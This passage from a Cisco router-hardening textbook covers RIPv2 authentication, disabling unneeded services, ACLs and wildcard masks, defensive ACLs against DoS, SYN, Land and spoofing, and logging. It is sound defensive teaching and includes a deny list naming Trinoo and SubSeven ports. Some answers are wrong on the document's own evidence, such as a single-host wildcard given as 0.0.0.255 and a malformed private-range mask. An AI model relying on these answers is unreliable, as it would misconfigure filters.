LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)^Z
LEFT#
RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#version 2
RIGHT(config-router)#network 172.18.0.0
RIGHT(config-router)#network 192.168.20.0
RIGHT(config-router)^Z
RIGHT#
CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#version 2
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)^Z
CENTER#
The authentication used is a key and MD5. The following conguration fragment
shows the setup of RIPv2 authentication. In this fragment, rst the router is told
that RIP authentication is required, then the key (the word strongpassword) is
created.
Router#configure terminal
Router(config)#interface ethernet0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)# interface serial0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)# interface serial1
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#^Z
Router#configure terminal
Router(config)#key chain 3
Router(config-keychain)#key 1
Router(config-keychain-key)#key-string strongpassword
Router(config-keychain-key)#^Z
Router#
All routers that will exchange routing updates on the same network must use the
same conguration, so the authentication will match. Once the router is cong-
ured, if you were to enter the show running-config command, you would
get the following new pieces in the output:
126 Tactical Perimeter Defense
enable secret 5 $1$v13S$Nk8zY5NcYor5VvAfcfZCn0
enable password 2501
!
!
key chain 3
key 1
key-string strongpassword
!
interface Ethernet0
ip address 172.16.0.1 255.255.0.0
ip rip authentication mode md5
ip rip authentication key-chain 3
no mop enabled
interface Serial0
no ip address
shutdown
TASK 3B-3
Viewing a RIPv2 Capture
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account, and Network Monitor is running.
1. Open ripv2withAuthentication.cap, located in C:\Tools\Lesson3.
2. Expand Frame One (the only frame) and observe the contents of the
packet.
3. Look for the destination address of the packet. Find the IP and MAC
destination addresses.
4. Observe the source address. You can conclude that this is likely the source
address of a router in the network.
5. Expand the RIP portion of the frame capture.
6. Examine the network details sent in the packet.
7. Observe the addition of the Authentication portion of the capture and the
additional elds not present in the RIPv1 packet. Second, observe that the
Routing Data is still visible.
8. Close Network Monitor.
Lesson 3: Routers and Access Control Lists 127
Topic 3C
Removing Protocols and Services
The fundamental concept of hardening the router is no different than hardening
Linux or Windows. You must remove all of the protocols and services that are
unused. You must congure the required protocols and services so that they are
secured for access. In this topic, you will look at removing many of the protocols
and services that are often not used on a router and continue to harden the
device.
CDP
The Cisco Discovery Protocol (CDP) is a protocol used by Cisco routers to
exchange information, such as platform information and status, with each other.
In general, CDP can be a useful thing to use when troubleshooting in a simple
environment. Unfortunately, like most things that can make our lives as adminis-
trators a little easier, CDP can make an attackers job a little easier because it
gives out important information such as the IOS version that the router is
running. And, of course, knowing what IOS version is running makes an attack-
ers job much easier since he or she will have a much better idea of what exploits
will work against such a target.
In the following conguration fragment, you can see that turning off CDP for the
entire router is not a complex set of commandsonly two commands are
required:
Router#config terminal
Router(config)#no cdp run
Router(config)#^Z
Router#
However, it may be desirable to stop CDP only on those interfaces that are not
connected directly to another router. Perhaps there is only a direct link between
two serial interfaces, and you want to allow CDP to run there, but not on the
internal Ethernet network. In the following conguration fragment, CDP is dis-
abled just for the Ethernet interface. Note that the only addition is the dening of
the interface, and the command is no cdp enable, instead of no cdp run:
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#
128 Tactical Perimeter Defense
TASK 3C-1
Turning Off CDP
1. Create the conguration fragment that you would use for turning off
CDP on Ethernet 0, Ethernet 1, and Serial 1.
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#interface Ethernet 1
Router(config-if)#no cdp enable
Router(config-if)#interface Serial 1
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#
ICMP
ICMP provides, among other functions, the ability to use the often-required ping
and traceroute commands. However, ICMP has become one of the most misused
of all protocols. DoS and DDoS attacks use ICMP, and more and more attacks
take advantage of this function of the network. In this section, only a few
examples of hardening ICMP are discussed.
ICMP Directed Broadcast
Smurf is an attack that takes advantage of ICMP. Specically, what Smurf does is
to get many machines to ood a single host with ICMP packets, effectively shut-
ting down that host. The way this attack works is to ping an entire network, using
a spoofed IP address. When every host of the network responds to the IP address,
that machine has been attacked. This can easily lead to hundreds of machines
responding to a host simultaneously.
The following conguration fragment shows the disabling of ICMP directed
broadcasts on the Serial 1, Serial 0, and Ethernet 0 interfaces. To protect fully
against this attack, you should turn off broadcasts like this on all interfaces.
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed broadcast
Router(config)#interface Serial 0
Router(config-if)#no ip directed broadcast
Router(config)#interface Serial 1
Router(config-if)#no ip directed broadcast
Router(config-if)#^Z
Router#
ICMP Unreachable
Another very common attack is for a potential intruder to scan your system(s)
looking for services that are open and that can be exploited. It is common to use
ICMP to perform these scans of systems. If you remove the ICMP Unreachable
message, be aware that your system will not respond to desired unreachable mes-
traceroute:
An operation of sending
trace packets for determining
information; traces the route
of UDP packets for the local
host to a remote host.
Normally traceroute displays
the time and location of the
route taken to reach its
destination.
Lesson 3: Routers and Access Control Lists 129
sages, such as when your internal users legitimately need them, such as during
time-outs. The following conguration fragment shows the disabling of ICMP
Unreachable messages on the Serial 0 interface. To remove ICMP Unreachable
messages on the entire router, this command needs to be entered for each
interface.
Router#config terminal
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router
TASK 3C-2
Hardening ICMP
1. Create the conguration fragment that you would use to disable ICMP
Directed Broadcasts and ICMP Unreachable messages on the entire
router, which has the Ethernet 0, Serial 0, and Serial 1 interfaces.
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed broadcast
Router(config-if)#no ip unreachables
Router(config)#interface Serial 0
Router(config-if)#no ip directed broadcast
Router(config-if)#no ip unreachables
Router(config)#interface Serial 1
Router(config-if)#no ip directed broadcast
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#
Source Routing
A feature that was added to routers to increase the control administrators had over
the network was source routing. This feature has become a vulnerability that
attackers now use. Source routing is used to allow a packet to dictate the path it
should take through a routed network. This packet does not follow the routing
tables as designated by the routing protocols. Doing so may allow an attacker to
bypass critical systems, such as a rewall or an IDS. In most situations, there is
no need for source routing to be allowed on any router. The conguration frag-
ment that follows shows the disabling of the source routing service:
Router#config terminal
Router(config)#no ip source-route
Router(config)#^Z
Router#
130 Tactical Perimeter Defense
Small Services
TCP and UDP small services are enabled on some routers by default (generally
IOS 11.3 and previous versions). Small services are not often used anymore and
include echo, discard, daytime, and chargen. On most routers, be sure to disable
these services. The conguration fragment that follows shows the disabling of
small services for both TCP and UDP:
Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#^Z
Router#
Finger
Finger is another older service that is rarely used in modern networks. The Finger
service is used to nd information about users who are logged into a router. On
older versions of the IOS (11.2 and older), Finger is disabled by using the
no service finger command. On newer versions of the IOS (11.3 and
newer), Finger is disabled by using the no ip finger command. In the fol-
lowing code, the rst conguration fragment shows the removal of the Finger
service from an older router, and the second fragment shows the removal of the
Finger service from a newer router:
Router#config terminal
Router(config)#no service finger
Router(config)#^Z
Router#
Router#config terminal
Router(config)#no ip finger
Router(config)#^Z
Router#
Small services are also
known as small servers.
Lesson 3: Routers and Access Control Lists 131
Remaining Services
As a security professional, you know that hardening a piece of equipment means
disabling or removing all of the services and protocols that you are not using. In
this section, you will see several other services that you should consider disabling
for your router. In consideration of space, every service and protocol cannot be
listed in this sectiononly several of the signicant services can be highlighted.
The BootP service is used to remotely boot computers via the network. This
service can be disabled by using the no ip bootp server command.
The DNS function is enabled on Cisco routers, but there is no dened name
server. The net result is broadcasting for all DNS requests. To disable this
function, use the no ip name-server command.
The Network Time Protocol (NTP) is used for time synchronization on the
network. This service can be disabled by using no ntp server. If you
want to disable this protocol for only a single interface, use ntp disable,
when you are in the Interface Mode.
The Simple Network Management Protocol (SNMP) is used to communicate
between network devices. SNMP left as-is on routers can provide informa-
tion about the router to attackers. Disable SNMP by using
no snmp-server.
HTTP is used on some routers to allow for remote access and management.
Unless specically required in your organization, this should be disabled. To
disable HTTP, use no ip http server.
The conguration fragment that will disable all of the above services will look
like this:
Router#config terminal
Router(config)#no ip bootp server
Router(config)#no ip name-server
Router(config)#no ntp server
Router(config)#no snmp-server
Router(config)#no ip http server
Router(config)#^Z
Router#
When NTP is used in
conjunction with syslog
services, therefore keeping
accurate timestamps on log
entries, it can be useful for
forensic purposes.
132 Tactical Perimeter Defense
TASK 3C-3
Removing Unneeded Services
1. Create the conguration fragment that you would use to remove the fol-
lowing services from the whole IOS v12.x router: CDP, ICMP Directed
Broadcasts, Small Servers, Source Routing, and Finger. For this exercise,
you can assume that the interfaces are named E0, S0, and S1.
Router#config terminal
Router(config)#no cdp run
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed broadcast
Router(config)#interface Serial 0
Router(config-if)#no ip directed broadcast
Router(config)#interface Serial 1
Router(config-if)#no ip directed broadcast
Router(config-if)#^Z
Router#
Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#no ip source-route
Router(config)#no ip finger
Router(config)#^Z
Router#
AutoSecure
A newer security feature, built into the IOS starting with version 12.3(1) is called
AutoSecure. AutoSecure is essentially a script designed to help you secure the
router by following a set of questions versus coding line-by-line the services and
interfaces you want to secure.
AutoSecure can also address your passwords, ensuring that no simple words are
used, prompt for the conguration of SSH, and can enable console logging,
among other security issues. AutoSecure has its security features divided into two
core groups (Cisco calls these groups: Planes). These two groups are called the
Management Plane and the Forwarding Plane.
The Management Plane
The Management Plane of the AutoSecure feature is where the majority of your
services are addressed. Both the global services, and the services that are unique
to each interface are dealt with in this Plane. The following list details the ser-
vices that are specic to each interface that can be disabled with AutoSecure:
ICMP (including redirects, unreachables, and mask replies)
Directed broadcasts
Maintenance Operations Protocol (MOP) services
Proxy-Arp
Lesson 3: Routers and Access Control Lists 133
You know by now that there are many more security issues other than the ones
addressed in the previous list. The following list, details the services that are glo-
bal, to the whole router, which can be disabled with AutoSecure:
BootP
CDP
Finger
HTTP Server
IdentD protocol
Network Time Protocol (NTP)
Packet Assembler and Disassembler (PAD)
Source Routing
Small Servers (both TCP and UDP)
The Forwarding Plane
In the context of this course, the only feature of The Forwarding Plane that will
be discussed is the Context-based Access Control (CBAC). If you are using this
feature, AutoSecure will prompt you through the congurations. CBAC will be
addressed later in this lesson.
Topic 3D
Creating Access Control Lists
Access Control Lists (ACLs) enable network administrators to not only control
access from a security standpoint, but also can be used to restrict bandwidth use
on critical links. In this and the following topic, the discussion will be on IP
access lists, but be aware that access lists can exist for other routed protocols,
such as AppleTalk and IPX/SPX.
An ACL is a packet lter that compares a packet with a given set of criteria. The
ACL checks the packet and acts upon the packet as dened by the list. Access
Control Lists are divided into several main categories, and for this course, you
will focus on three categories: Standard ACLs, Extended ACLs, and Context-
based ACLs.
Standard ACLs are designed to look at the source address of a packet that
has been received by the router. The result of the list is to either permit or
deny the packet based on the subnet, host, or network address. A standard
access list takes effect for the full IP protocol stack.
Extended ACLs are designed to look at both the source and destination
packet addresses. Not limited to source IP address, extended lists allow for
checking of protocol, port number, and destination address. This additional
exibility is the reason that many administrators implement extended lists on
their networks.
Context-based ACLs are designed to look at information from layer 3 all the
way through layer 7. This becomes the Cisco IOS stateful rewall function
inside the Cisco Router.
packet lter:
Inspects each packet for user
dened content, such as an
IP address, but does not
track the state of sessions.
This is one of the least
secure types of rewall.
134 Tactical Perimeter Defense
Access Control List Operation
The function of an access list is the same internally in the router, regardless of
the type of list (standard, extended, and so on). An ACL can be designed to func-
tion for both inbound and outbound packets. When an ACL is checking inbound
packets, the list is checked to see if the packet is allowed prior to the router
checking to see if the packet has a destination in the routing table.
When an ACL is checking outbound packets, the packet will rst run through the
routers table, looking for a match. If there is a route for the packet, then the
ACL is applied to the outbound packet.
Figure 3-13: The Access Control List process.
Figure 3-13 illustrates this outbound process. A packet is taken in via Interface
E0. In this example, the packet is incoming on Interface Ethernet 0 and destined
to be outgoing on Interface Ethernet 1. Because the list is used to determine
whether or not the packet is to exit on interface Ethernet 1, this list can be deter-
mined to be an outgoing list.
The Access List Process
A critical component of access list is to understand that they operate in sequence,
from the top down. In other words, the rst statement of an access list is
checked. If the packet does not match the rules of that statement, then the packet
is sent to the next statement, and on and on, until there is a match.
Once there is a match, the packet will follow that rule. In the event that there are
two rules that can apply to the same packet, whichever rule the packet hits rst is
the one that it will follow.
There will always be a match, since the end of every access list is an implicit
deny, meaning that every list must have at least one permit statement or all pack-
ets will be denied! Figure 3-14 shows a graphical example of an access list
statement process.
Lesson 3: Routers and Access Control Lists 135
Figure 3-14: The list process of an ACL.
The Wildcard Mask
IP access lists use a value known as the wildcard mask to determine whether or
not a packet matches a given statement in the list. The wildcard mask uses 1s and
0s to identify the dened IP address(es) for permission or denial.
Wildcard masks are 32-bit values that look like traditional subnet masks, but they
do not function in the same manner. A wildcard mask uses the 1s and 0s to match
dened bits of an IP address. The rules of the bits of a wildcard mask are as fol-
lows:
If the wildcard mask bit is a 1, then do not check the corresponding bit of
the IP address for a match.
If the wildcard mask bit is a 0, then do check the corresponding bit of the IP
address for a match.
The chart in Figure 3-15 shows several examples of the wildcard mask checking
options. Where there is a 0, the values are checked for a match, and where there
is a 1, the value is not checked.
136 Tactical Perimeter Defense
Figure 3-15: Examples of wildcard masks.
As you can see from this chart, if there were a mask of 11111111, then none of
the eight bits of the corresponding IP address would be checked. Likewise, if
there were a wildcard mask of 00000000, then all eight bits of the corresponding
IP address would be checked.
Wildcard Mask Examples
If an administrator wanted to have an access list statement match a single host in
a network, the following wildcard mask could be used.
Item Value
IP Address 10.15.10.187
Subnet Mask 255.255.255.0
Wildcard Mask 0.0.0.0
This tells the router to check every bit of the IP address, and if those bits are
10.15.10.187, then this access list statement applies to this host.
If the goal is to have an access list statement match an entire network, the fol-
lowing wildcard mask could be used.
Item Value
IP Network 10.15.10.0
Subnet Mask 255.255.255.0
Wildcard Mask 0.0.0.255
This tells the router to check only the rst 24 bits of the IP address, and if the
decimal value of those bits are 10.15.10, then this access list statement applies to
this host.
If the goal is to block a specied subnet, the mask requires a bit more calcula-
tion, but still functions the same way. In the event that the administrator wants to
have subnet 10.15.10.32 match an access list statement, the mask would be as
follows.
Item Value
IP Subnet Address 10.15.10.32
Lesson 3: Routers and Access Control Lists 137
Item Value
Subnet Mask 255.255.255.224
Wildcard Mask 0.0.0.31
This tells the router to check all but the last ve bits of the fourth octet. If the
checked bit equals 10.15.10.32, then the access list statement applies to this host.
TASK 3D-1
Creating Wildcard Masks
1. If your goal is to block out a single host, such as 192.168.27.93, that uses
255.255.255.0 as the subnet mask, what wildcard mask would you use?
0.0.0.255
2. If your goal is to block out a subnet of 10.12.24.0 that uses 255.255.248.0
as the subnet mask, what wildcard mask would you use?
0.0.7.255
3. If your goal is to block out network 172.168.32.0 that uses 255.255.255.0
as the subnet mask, what wildcard mask would you use?
0.0.0.255
Topic 3E
Implementing Access Control Lists
In this topic, we will detail the implementation of and rule-creation for access
lists. There will be examples of access lists and their syntax on a Cisco router.
Examples will include both standard and extended IP access lists, the most com-
mon lists for networks connected to the Internet today.
Access Control Lists are implemented in two stages on Cisco routers. The rst
stage is to create the list, including all of its statements. The second stage is the
implementation of the list on an interface of a router, dening whether the list is
to lter packets as an inbound or outgoing list.
Standard Access Control List Command Syntax
To create a standard ACL, the following line shows the proper syntax. Items in
italics are variables to be lled in.
Router(config)#access-list access-list-number {permit|deny}
source [ source-mask ]
Although you have the
option of using standard or
extended access lists, the
extended lists are preferred
because they provide more
granularity when you are
permitting and denying
trafc.
138 Tactical Perimeter Defense
Where:
access-list is the actual command to create a list.
access-list-number is a value between 1 and 99, that is selected to create a
standard ACL.
permit|deny is the value that denes whether the list will grant or block
access.
source is the value that is the actual source address to match.
source-mask is the value that species the wildcard mask for the dened
host.
Once the list has been created, the second stage is to apply the list to an
interface. Before you do this, however, make sure that you have specied the
interface that you want to be affected by the list. The syntax for list application is
shown here. Again, items in italics are variables to be lled in.
Router(config-if)#ip access-group access-list-number
{in|out}
Where:
ip access-group is the command to link (implement) a list to an
interface.
access-list-number is the value assigned to the actual list to be implemented
on this interface.
in|out is the value that denes whether the list will lter inbound or out-
bound packets.
Extended Access Control List Syntax
To create an extended ACL, the following line shows the proper syntax. Remem-
ber, items in italics are variables to be lled in.
Router(config)#access-list access-list-number {permit|deny}
protocol source source-mask destination destination-mask
[operator|operand]
Where:
access-list is the actual command to create a list.
access-list-number is a value between 100 and 199, that is selected to create
an extended ACL.
permit|deny is the value that denes whether the list will grant or block
access.
protocol is the value that denes what protocol to lter.
source is the value that denes the source IP address.
source-mask is the value that denes the wildcard mask for the source.
destination is the value that denes the destination IP address.
destination-mask is the value that denes the wildcard mask for the
destination.
operator|operand is the value that denes the options for the list.
Options include:
GTGreater than
LTLess than
Lesson 3: Routers and Access Control Lists 139
EQEqual to
NEQNot Equal to
Once the list has been created, the second stage is to apply the list to an
interface. The syntax for list application is shown. As before, items in italics are
variables to be lled in.
Router(config-if)#ip access-group access-list-number
{in|out}
Where:
ip access-group is the command to link (implement) a list to an
interface.
access-list-number is the value assigned to the actual list to be implemented
on this interface.
in|out is the value that denes whether the list will lter inbound or out-
bound packets.
Figure 3-16: A sample network for ACL implementation.
Use Figure 3-16 with the network and host IP addresses dened to look at several
examples of access lists. The same gure will be used for all examples, only with
different lists, different goals, and different implementations. These examples will
be using both standard and extended IP access lists.
Denial of a Specific Host
Our rst example will be the simple denial of a dened host into the router. This
can be accomplished by using a standard ACL.
140 Tactical Perimeter Defense
The conguration fragment for this example is:
Router#configure terminal
Router(config)#access-list 23 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 23 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 23 in
Router(config-if)#^Z
Router#
Denial of a Subnet
Our second example will be the denial of a dened host out to the Internet and
the denial of an entire network to the Internet. This can also be accomplished by
using a standard ACL. The conguration fragment for this example is:
Router#configure terminal
Router(config)#access-list 45 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 45 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 45 permit 0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 45 out
Router(config-if)#^Z
Router#
Denial of a Network
Our third example will be the denial of an entire network from another network.
This can be accomplished by using a standard ACL. The conguration fragment
for this example is:
Router#configure terminal
Router(config)#access-list 57 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 57 deny 192.168.10.0 0.0.0.255
Router(config)#access-list 57 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 57 out
Router(config-if)#interface Ethernet 1
Router(config-if)#ip access-group 57 out
Router(config-if)#^Z
Router#
Granting Telnet from One Specific Host
Our fourth example will be limiting the permission of given hosts to telnet to the
Internet and the denial of a network telnetting to the Internet. This can be accom-
plished by using an extended ACL, due to the need to control access to individual
ports. The conguration fragment for this example is:
Router#configure terminal
Router(config)#access-list 123 permit tcp 192.168.20.16 0.0.0.0
0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit tcp 192.168.10.7 0.0.0.0
0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 deny tcp 192.168.0.0 0.0.255.255
0.0.0.0 255.255.255.255 eq 23
Router(config)#access-list 123 permit ip 0.0.0.0 255.255.255.255
0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 123 out
Router(config-if)#^Z
Router#
The third line is permitting
all trafc not denied by the
second line. The word any
can be used in place of 0.0.
0.0 255.255.255.255.
The fourth line is permitting
all trafc not denied by the
second and third lines.
For the fth line, permit
ip any any could be
used to shorten the syntax.
Lesson 3: Routers and Access Control Lists 141
Granting FTP to a Subnet
Our fth example will be granting one subnet the ability to ftp to the Internet,
while denying the other subnet. Again, this can be accomplished by an extended
ACL, due to the need to control access to individual ports. The conguration
fragment for this example is:
Router#configure terminal
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255
0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 permit tcp 192.168.20.0 0.0.0.255
0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255
0.0.0.0 255.255.255.255 eq 20
Router(config)#access-list 145 deny tcp 192.168.10.0 0.0.0.255
0.0.0.0 255.255.255.255 eq 21
Router(config)#access-list 145 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 145 out
Router(config-if)#^Z
Router#
Defending Against Attacks with ACLs
ACLs can be used for much more than simply granting or denying access to a
service or utility. They can be used to guard against known attacks on the net-
work, such as SYN and DoS attacks. This is due to the fact that many tools use
known and identiable patterns in their attacks.
Anti-DoS ACLs
These ACLs work by recognizing the protocol and port selection of the DoS
attack. It is possible that by using these ACLs, you may block legitimate applica-
tions that have chosen the same high port values, so that must be taken into
account. In order to prevent hosts inside the network from participating in a DoS
on an Internet host, you should consider placing these on all interfaces, in both
directions. At the minimum, you will place these lists on the inbound interfaces
that are connected to the Internet.
In the conguration fragment that follows, the rst section (ports 27665, 31335,
27444) of the list is designed to block the TRINOO DDoS, and the second sec-
tion (ports 6776, 6669, 2222, 7000) is designed to block the SubSeven DDoS.
Router(config)#access-list 160 deny tcp any any eq 27665
Router(config)#access-list 160 deny udp any any eq 31335
Router(config)#access-list 160 deny udp any any eq 27444
Router(config)#access-list 160 deny tcp any any eq 6776
Router(config)#access-list 160 deny tcp any any eq 6669
Router(config)#access-list 160 deny tcp any any eq 2222
Router(config)#access-list 160 deny tcp any any eq 7000
Anti-SYN ACLs
The TCP SYN attack is where the attacker oods the target host and disallows
any legitimate connections to be made by the target host. To work on blocking
this, the ACL must allow legitimate TCP connections, which are created by hosts
inside the network, but disallow connections to those hosts from outside (like on
the Internet).
142 Tactical Perimeter Defense
In this rst conguration fragment, traffic that is established internally is allowed
out, and incoming connections are not able to create new sessions.
Router#configure terminal
Router(config)#access-list 170 permit tcp any 192.168.20.0
0.0.0.255 established
Router(config)#access-list 170 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 170 in
Router(config-if)#^Z
Router#
Anti-Land ACLs
Another type of attack that has been around for some time is the Land attack.
The Land attack is rather simple in design, but it can cause serious network dam-
age to unprotected systems. The attack works by sending a packet from an IP
address to the same IP address, and using the same ports. So, a packet would be
sent from 10.10.10.10:5700 to 10.10.10.10:5700 causing a signicant slowdown
or DoS of the target.
The following conguration fragment shows the defense against a Land attack on
host 10.20.30.50, which is an IP address of an external interface on the router.
Router#configure terminal
Router(config)#interface Serial 0
Router(config-if)#ip address 10.20.30.50 255.255.255.0
Router(config-if)#exit
Router(config)#
Router(config)#access-list 110 deny ip host 10.20.30.50 host
10.20.30.50 log
Router(config)#access-list 110 permit ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 110 in
Router(config-if)#^Z
Router#
Anti-spoofing ACLs
Spoong of packets has become more commonplace due to the increased number
of tools that provide this function. You can use your router to combat this issue
by not allowing packets to enter the network if they are coming from an internal
IP address.
When you create these lists, you want them to be complete. In other words, do
not forget to block the broadcast addresses (to prevent attacks like the Smurf
attack), the network addresses themselves, and private or reserved addresses. In
the following conguration fragment, the internal network is 152.148.10.0/24, and
you will see that there are quite a few lines necessary to provide for full spoof
protection:
Lesson 3: Routers and Access Control Lists 143
Router#configure terminal
Router(config)#access-list 130 deny ip 152.148.10.0 0.0.0.255 any
Router(config)#access-list 130 deny ip 127.0.0.0 0.255.255.255
any
Router(config)#access-list 130 deny ip 0.0.0.0 255.255.255.255
any
Router(config)#access-list 130 deny ip 10.0.0.0 0.255.255.255 any
Router(config)#access-list 130 deny ip 172.16.0.0 0.0.240.255 any
Router(config)#access-list 130 deny ip 192.168.0.0 0.0.255.255
any
Router(config)#access-list 130 deny ip host 255.255.255.255 any
Router(config)#access-list 130 permit ip any 152.148.10.0
0.0.0.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 130 in
Router(config-if)#^Z
Router#
TASK 3E-1
Creating Access Control Lists
Setup: Use the network as diagrammed in Figure 3-16 for this task.
1. Create the conguration fragment that you would use to create an
Access Control List to prevent a SYN attack coming from the Internet
into the private networks.
Router#configure terminal
Router(config)#access-list 135 permit tcp any 192.168.20.0
0.0.0.255 established
Router(config)#access-list 135 permit tcp any 192.168.10.0
0.0.0.255 established
Router(config)#access-list 135 deny ip any any
Router(config)#interface Serial 0
Router(config-if)#ip access-group 135 in
Router(config-if)#^Z
Router#
Context-based Access Control
Although a detailed discussion of Ciscos Context-based Access Control is out of
the scope of this book, this feature is quite valuable, and worth some
investigation. The Cisco Context-based Access Control Lists function is part of
the Cisco IOS Firewall Feature Set, and provides powerful options if your router
is going to play a signication part of your rewall system.
144 Tactical Perimeter Defense
Cisco Context-based Access Control (CBAC) works by ltering TCP, UDP, and
in more recent revisions, ICMP network traffic. CBAC is able to inspect inside
the packet looking at the actual application.
CBAC essentially works by creating a dynamic (temporary) connection in your
router, by keeping track of the state of your network traffic. For example, assume
you had an access control list that said no Telnet connections are to be accepted
inbound from the Internet to your router. With CBAC, you can build your system
to allow an inbound Telnet connection, IF the router recognizes that packet as the
return traffic of a session that was started by an authorized internal user.
When packets enter the router, they are rst processed through the running of
access control lists. If a packet is denied, it will not move on to the CBAC
inspection. If the packet is allowed after running through the ACLs, then that
packet will move on to CBAC inspection.
Topic 3F
Logging Concepts
Although it does not get the credit or generate a high level of interest, logging on
the router is a critical aspect of router hardening. Logs enable you to investigate
attacks, nd problems in the network, and analyze the network.
When you are conguring the logging options on a router, just as logging else-
where in the network, you must walk a ne line between gathering too much and
too little information. Log too much, and you will have a difficult time nding
that single piece of critical information you need to make a decision or to per-
form an action. Log too little, and you do not have enough information to make
an informed decision or to take proper action.
There are many different kinds of logging applications and software products that
can track and record logs from all over the network. These applications can then
send messages to a pager or cell phone when signicant events happen. In this
section, you will look at just the options that the actual router can manage, with-
out using any major third-party applications.
Cisco Logging Options
On a Cisco router, the device can log information using several different methods,
such as:
Console Logging: Log messages are sent to the console port directly.
Terminal Logging: Log messages are sent to the VTY sessions.
Buffered Logging: Log messages are kept in the RAM on the router. Once
the buffer lls, the oldest messages are overwritten by newer messages.
Syslog Logging: Log messages can be sent to an external syslog server to
store and sort the messages there.
SNMP Logging: Log messages are sent (by using SNMP traps) to an SNMP
server on the network.
Since UDP communications
do not establish a session,
the CBAC system
approximates the time (as
dened by the administrator)
a session should remain
open.
Lesson 3: Routers and Access Control Lists 145
Log Priority
The router has a built-in function of priority listing for log messages. The levels
range from 0 to 7. If a message is given a lower number, it is considered to be a
more critical message. So, Level 1 is more critical than Level 6.
When you select a level, that level and all others of a lower number will be
displayed. For example, if you select level 3, you will be presented with mes-
sages from level 3 to 0. If you select level 7, you will be presented with
messages from level 7 to 0.
The following table lists the level of logs, along with their titles and descriptions.
Level Title Description
0 Emergencies System is (or is becoming) unusable.
1 Alerts Immediate action is needed.
2 Critical A critical condition has occurred.
3 Errors An error condition has occurred.
4 Warnings A warning condition has occurred.
5 Notications Normal, but noteworthy event.
6 Informational Informative message.
7 Debugging Debugging message.
The following table lists an example event for each level of severity.
Level Example
0 The IOS was unable to initialize.
1 The core router temperature is too high.
2 A problem in assigning memory occurred.
3 The memory size allocated is invalid.
4 Cryptography operation is unable to complete.
5 An interface changed state to up or down. (This is a very common event.)
6 A packet has been denied by an Access Control List.
7 No event triggers this level; debug messages are displayed only when the debug
option is used.
An example of what a log line will look like in the router is:
%SYS-5-CONFIG_I: Configured from console by vty1 (172.16.10.1)
In this line, the %SYS-5-CONFIG_I indicates that a Level 5 message was logged.
Following the colon is the message itself. In this case, the router had a congura-
tion change made via a VTY session using IP address 172.16.10.1.
146 Tactical Perimeter Defense
Configuring Logging
In the following examples, you will see how to congure different forms of
logging. Some will use the buffer, others the console. Viewing the conguration
fragments through this section will enable you to determine which type of log-
ging you will use in given situations. On the Cisco router, the command to enable
logging is entered in Global Conguration Mode, using the logging on
command.
Timestamping
In order for you to properly analyze the logs, you will need to know what hap-
pened when, not just that something happened. The assignment of a time that an
event occurred, or to timestamp, is an option in the router. The Cisco command
to congure the timestamp option is service timestamp log datetime.
There are three options that can be added to this message.
The msec option will include the millisecond in a log entry. This may or
may not be required, based on your goals. If not added, the log will round
the event to the nearest full second.
The localtime option will make the router stamp the logs using the local
time, so that it is easier for people to read and analyze the logs. When using
a syslog server, this option is often left off.
The show-timezone option adds the time zone to the log message. This
can be useful when working with log les from many locations and regions.
Console Logging
Console logging is perhaps the most straightforward of all of the logging options
in the Cisco router. The following conguration fragment shows logging set to
level 5 and to use the console as the method.
Router#configure terminal
Router(config)#logging on
Router(config)#logging console notification
Router(config)#^Z
Router#
In this example, level 5 logging has been congured, This means that items in the
access list level will not be logged, nor will any debug messages. Had the goal
been to see only those log messages that are level 2 or more critical, the proper
command would have been logging console critical.
Buffered Logging
Buffered logging requires you to dene the memory size that will be used for the
logs. The general formula that many follow is that if the router has less than 16
MB of RAM, your log can be 16 kilobytes. If your router has more than 16 MB
of RAM, then your log can go as high as 32 or even 64 KB.
On all logs, the time and date can be added to the messages, which is a recom-
mended procedure. On buffered logging, however, it goes from a recommended to
a required procedure. This is due to the fact that the router discards old messages
and replaces them with new messages, when the buffer space is lled. So, the
time of the log is a critical component to buffered logging. The following con-
guration fragment shows logging set to level 2, and using a timestamp.
When you are conguring
logging in IOS 11.3 and
earlier versions, the
command must include the
